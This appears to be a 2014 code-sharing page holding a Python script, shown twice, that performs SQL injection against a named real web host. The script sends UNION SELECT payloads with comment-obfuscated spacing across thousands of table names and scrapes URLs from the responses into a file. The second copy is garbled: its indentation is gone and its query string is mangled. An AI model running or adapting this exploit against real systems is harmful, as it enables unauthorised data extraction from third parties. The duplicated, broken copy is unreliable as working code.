yagihash · June 18, 2014 19:12
diff --git a/get_urls.py b/get_urls.py
 import re
 import sys
 import urllib.request

 o = open(sys.argv[1], "w")

 url = "http://backdoor.dentsu.jp/query/?q=%%27/**/%s%%23&ts=4677631&_=1403019525069"
 query = "UNION/**/SELECT/**/*/**/FROM/**/%s/**/"

 def get_urls(url, union):
    dst = url % union
    contents = urllib.request.urlopen(dst).read().decode("utf-8")
    contents = contents.replace("\\", "")
    urls = re.findall(r'"http:.+?"', contents)
    return [u.replace('"', "") for u in urls]

 union = ""
 for i in range(1, 20000):
    table = "table%s" % ("00000%d" % i)[-5:]
    union += query % table
    if i % 175 == 0:
        urls = get_urls(url, union)
        union = ""
        o.write("\n".join(urls) + "\n")
 else:
    urls = get_urls(url, union)
    union = ""
    o.write("\n".join(urls) + "\n")
 o.close()
	import re
	import sys
	import urllib.request

	o = open(sys.argv[1], "w")

	url = "http://backdoor.dentsu.jp/query/?q=%%27/**/%s%%23&ts=4677631&_=1403019525069"
	query = "UNION//SELECT////FROM//%s/*/"

	def get_urls(url, union):
	dst = url % union
	contents = urllib.request.urlopen(dst).read().decode("utf-8")
	contents = contents.replace("\\", "")
	urls = re.findall(r'"http:.+?"', contents)
	return [u.replace('"', "") for u in urls]

	union = ""
	for i in range(1, 20000):
	table = "table%s" % ("00000%d" % i)[-5:]
	union += query % table
	if i % 175 == 0:
	urls = get_urls(url, union)
	union = ""
	o.write("\n".join(urls) + "\n")
	else:
	urls = get_urls(url, union)
	union = ""
	o.write("\n".join(urls) + "\n")
	o.close()